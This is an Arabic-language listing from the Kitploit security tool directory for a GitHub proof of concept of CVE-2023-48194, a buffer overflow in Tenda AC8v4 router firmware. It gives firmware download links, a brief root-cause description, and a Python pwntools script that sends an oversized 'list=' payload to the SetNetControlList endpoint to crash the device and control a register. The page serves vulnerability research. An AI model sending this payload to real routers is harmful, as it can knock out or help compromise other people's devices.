Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-48194 — إثبات مفهوم استغلال لثغرة تجاوز سعة المخزن المؤقت في برنامج ثابت لجهاز التوجيه Tenda AC8v4 (V16.03.34.09) عبر نقطة نهاية SetNetControlList، مما يوضح التحكم في سجل gp. | Kitploit
أدوات/GitHubGitHub/zt20xx/cve-2023-48194
أمان الأنظمة المدمجةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائيأمان الأجهزة وإنترنت الأشياءاستغلال الملفات الثنائية
GitHubzt20xx/cve-2023-48194

CVE-2023-48194

إثبات مفهوم استغلال لثغرة تجاوز سعة المخزن المؤقت في برنامج ثابت لجهاز التوجيه Tenda AC8v4 (V16.03.34.09) عبر نقطة نهاية SetNetControlList، مما يوضح التحكم في سجل gp.

عرض المستودع
18منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-48194

نظرة عامة

موقع تنزيل البرنامج الثابت:

https://www.tenda.com.cn/download/detail-3683.html

https://down.tenda.com.cn/uploadfile/AC8/V16.03.34.09.zip

https://static.tenda.com.cn/tdcweb/download/uploadfile/AC8/V16.03.34.09.zip

الإصدار المتأثر

AC8/V16.03.34.09

تفاصيل الثغرة

Tenda AC8v4 .V16.03.34.09. بسبب sscanf، يتم استبدال الرقم الأخير من s8 بـ \x0. بعد تنفيذ set_client_qos، يتم الحصول على التحكم في سجل gp

image-20231110220324578

image-20231111010734363

image-20231110211938397

إثبات المفهوم

إثبات مفهوم (PoC) لجعله يُنتج Segmentation fault (core dumped)

import requests
url = 'http://192.168.0.1/goform/SetNetControlList'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
    'Content-Length': '3003'
}
payload=b"list="

pad=0x407ff818-0x407ff7c0
from pwn import *
target=0x40302010
target=p32(target)
payload+=b"a"*(pad)+target+b"c"*(0x110-pad)
# list len >=0x100
try:
    requests.post(url, headers=headers, data=payload,timeout=3)
except requests.exceptions.ReadTimeout:
    print("test ok")

image-20240706214512012

قبل sscanf

image-20231110215023268

بعد ذلك، وسيتم تنفيذ ret

image-20231110215635663

image-20231110222010134

image-20231110222523163

تنزيل الأداة